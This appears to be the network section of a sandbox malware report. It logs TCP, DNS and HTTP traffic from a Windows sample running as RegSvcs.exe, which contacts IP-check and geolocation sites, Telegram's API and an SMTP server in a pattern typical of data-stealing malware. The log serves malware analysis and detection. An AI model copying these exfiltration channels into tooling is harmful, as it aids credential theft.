Jan 10, 2025 18:46:51.872991085 CET  49757       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:51.876823902 CET  80          49754     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:51.876924038 CET  49754       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:51.877911091 CET  80          49757     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:51.878108978 CET  49757       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:51.878251076 CET  49757       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:51.883080959 CET  80          49757     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:52.301496029 CET  49741       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:52.652055979 CET  80          49757     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:52.653765917 CET  49758       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:52.653801918 CET  443         49758     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:52.653903961 CET  49758       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:52.654170036 CET  49758       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:52.654181004 CET  443         49758     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:52.702279091 CET  49757       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:52.773367882 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:52.778140068 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:52.778440952 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:53.327390909 CET  443         49758     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:53.329015017 CET  49758       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:53.329047918 CET  443         49758     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:53.603744984 CET  443         49758     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:53.603815079 CET  443         49758     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:53.603883982 CET  49758       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:53.610033989 CET  49758       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:53.611176968 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:53.611437082 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:53.616261959 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:53.617573023 CET  49760       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:53.622453928 CET  80          49760     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:53.622531891 CET  49760       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:53.622620106 CET  49760       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:53.627409935 CET  80          49760     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:53.832989931 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:53.834193945 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:53.839164019 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.063441992 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.063697100 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:54.068612099 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.263209105 CET  80          49760     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:54.265014887 CET  49761       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:54.265058994 CET  443         49761     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:54.265136003 CET  49761       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:54.265398026 CET  49761       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:54.265408993 CET  443         49761     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:54.307893991 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.308298111 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:54.311517000 CET  49760       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:54.313056946 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.530957937 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.531132936 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:54.535955906 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.779189110 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.779405117 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:54.784240961 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:54.851583958 CET  443         49761     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:54.853080988 CET  49761       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:54.853105068 CET  443         49761     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:54.993686914 CET  443         49761     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:54.993743896 CET  443         49761     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:54.993843079 CET  49761       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:54.994589090 CET  49761       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:54.998228073 CET  49760       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:54.999231100 CET  49762       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:55.003246069 CET  80          49760     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:55.003300905 CET  49760       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:55.003963947 CET  80          49762     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:55.004017115 CET  49762       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:55.004106998 CET  49762       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:55.009474993 CET  80          49762     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:55.030709028 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.031269073 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:55.031367064 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:55.031478882 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:55.031491995 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:55.031516075 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:55.036016941 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036120892 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036132097 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036298037 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036308050 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036376953 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036386013 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036437035 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036473989 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.036482096 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.268027067 CET  587         49759     178.210.170.40  192.168.2.4
Jan 10, 2025 18:46:55.311510086 CET  49759       587       192.168.2.4     178.210.170.40
Jan 10, 2025 18:46:55.670500994 CET  80          49762     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:55.672485113 CET  49763       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:55.672523975 CET  443         49763     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:55.672570944 CET  49763       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:55.673084974 CET  49763       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:55.673094034 CET  443         49763     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:55.717751980 CET  49762       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:56.157469988 CET  443         49763     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:56.159331083 CET  49763       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:56.159364939 CET  443         49763     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:56.318106890 CET  443         49763     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:56.318170071 CET  443         49763     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:56.318234921 CET  49763       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:56.318749905 CET  49763       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:56.325175047 CET  49762       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:56.326241970 CET  49764       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:56.330147028 CET  80          49762     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:56.330200911 CET  49762       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:56.331053019 CET  80          49764     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:56.331186056 CET  49764       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:56.331399918 CET  49764       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:56.336204052 CET  80          49764     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:56.980945110 CET  80          49764     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:56.982180119 CET  49765       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:56.982233047 CET  443         49765     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:56.982296944 CET  49765       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:56.982537985 CET  49765       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:56.982552052 CET  443         49765     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:57.030312061 CET  49764       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:57.446733952 CET  443         49765     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:57.448781967 CET  49765       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:57.448822021 CET  443         49765     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:57.601298094 CET  443         49765     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:57.601366997 CET  443         49765     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:57.601440907 CET  49765       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:57.601927996 CET  49765       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:57.604739904 CET  49764       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:57.605953932 CET  49766       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:57.609776974 CET  80          49764     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:57.609847069 CET  49764       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:57.610809088 CET  80          49766     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:57.610887051 CET  49766       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:57.610989094 CET  49766       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:57.615798950 CET  80          49766     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:58.275707960 CET  80          49766     193.122.6.168   192.168.2.4
Jan 10, 2025 18:46:58.280836105 CET  49767       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:58.280889988 CET  443         49767     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:58.280945063 CET  49767       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:58.281505108 CET  49767       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:58.281517029 CET  443         49767     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:58.327127934 CET  49766       80        192.168.2.4     193.122.6.168
Jan 10, 2025 18:46:58.775954008 CET  443         49767     104.21.64.1     192.168.2.4
Jan 10, 2025 18:46:58.777653933 CET  49767       443       192.168.2.4     104.21.64.1
Jan 10, 2025 18:46:58.777690887 CET  443         49767     104.21.64.1     192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.927190065 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.927259922 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.927341938 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.927812099 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.930835962 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.931997061 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.935786963 CET8049766193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.935841084 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.936887026 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.936947107 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.937040091 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.941781044 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.748574018 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.749933004 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:59.749969959 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.750057936 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:59.750289917 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:59.750300884 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.795943975 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.258790016 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.263103962 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:00.263120890 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.417886019 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.417949915 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.418133974 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:00.418597937 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:00.421994925 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.422569990 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.426992893 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.427088976 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.427308083 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.427370071 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.427499056 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.432262897 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.063929081 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.065346003 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.065391064 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.065485954 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.065738916 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.065752983 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.108480930 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:01.644351959 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.646074057 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.646091938 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.758380890 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.758570910 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.758680105 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.759118080 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.768516064 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:01.769434929 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:01.769476891 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.769771099 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:01.770155907 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:01.770165920 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.773595095 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.773648977 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:02.402518988 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.402625084 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.404082060 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.404099941 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.404316902 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.406124115 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.447333097 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.653343916 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.653413057 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.653459072 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.665769100 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:07.899998903 CET4975780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:08.036043882 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.040905952 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.040983915 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.671487093 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.671659946 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.676460981 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.930634022 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.930921078 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.935728073 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.167845964 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.168138027 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.172945023 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.397497892 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.397691965 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.403825045 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.619775057 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.619944096 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.624716043 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.843091965 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.843266964 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.848040104 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.105071068 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.105802059 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.105879068 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.106029034 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.106029034 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.106046915 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.110563040 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110646009 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110766888 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110841990 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110851049 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110881090 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110889912 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.111016035 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.111025095 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.111032963 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.488493919 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.530479908 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:12.772139072 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:47:12.776983976 CET5354663162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:12.777055979 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:47:12.781850100 CET5354663162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:13.278953075 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:47:13.284190893 CET5354663162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:13.284295082 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:48:32.499456882 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:48:32.504468918 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:48:32.721909046 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:48:32.722207069 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:48:32.727385998 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:48:32.727510929 CET49759587192.168.2.4178.210.170.40
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 18:46:34.021141052 CET6307853192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:34.028306007 CET53630781.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.041728020 CET6534153192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET53653411.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.139118910 CET5156853192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:46.145946980 CET53515681.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:52.472429991 CET5554553192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:52.772402048 CET53555451.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:12.771651983 CET5358412162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:13.463980913 CET53537981.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 18:46:34.021141052 CET | 192.168.2.4 | 1.1.1.1 | 0x1129 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.041728020 CET | 192.168.2.4 | 1.1.1.1 | 0x413 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:46.139118910 CET | 192.168.2.4 | 1.1.1.1 | 0x4737 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:52.472429991 CET | 192.168.2.4 | 1.1.1.1 | 0x902e | Standard query (0) | mail.standartasansor.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 18:46:34.028306007 CET | 1.1.1.1 | 192.168.2.4 | 0x1129 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:46:34.028306007 CET | 1.1.1.1 | 192.168.2.4 | 0x1129 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:34.028306007 CET | 1.1.1.1 | 192.168.2.4 | 0x1129 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:34.028306007 CET | 1.1.1.1 | 192.168.2.4 | 0x1129 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:34.028306007 CET | 1.1.1.1 | 192.168.2.4 | 0x1129 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:34.028306007 CET | 1.1.1.1 | 192.168.2.4 | 0x1129 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.049424887 CET | 1.1.1.1 | 192.168.2.4 | 0x413 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.049424887 CET | 1.1.1.1 | 192.168.2.4 | 0x413 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.049424887 CET | 1.1.1.1 | 192.168.2.4 | 0x413 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.049424887 CET | 1.1.1.1 | 192.168.2.4 | 0x413 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.049424887 CET | 1.1.1.1 | 192.168.2.4 | 0x413 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.049424887 CET | 1.1.1.1 | 192.168.2.4 | 0x413 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:35.049424887 CET | 1.1.1.1 | 192.168.2.4 | 0x413 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:46.145946980 CET | 1.1.1.1 | 192.168.2.4 | 0x4737 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:46:52.772402048 CET | 1.1.1.1 | 192.168.2.4 | 0x902e | No error (0) | mail.standartasansor.com | | 178.210.170.40 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 193.122.6.168 | 80 | 3328 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:46:34.038968086 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 18:46:34.673624992 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
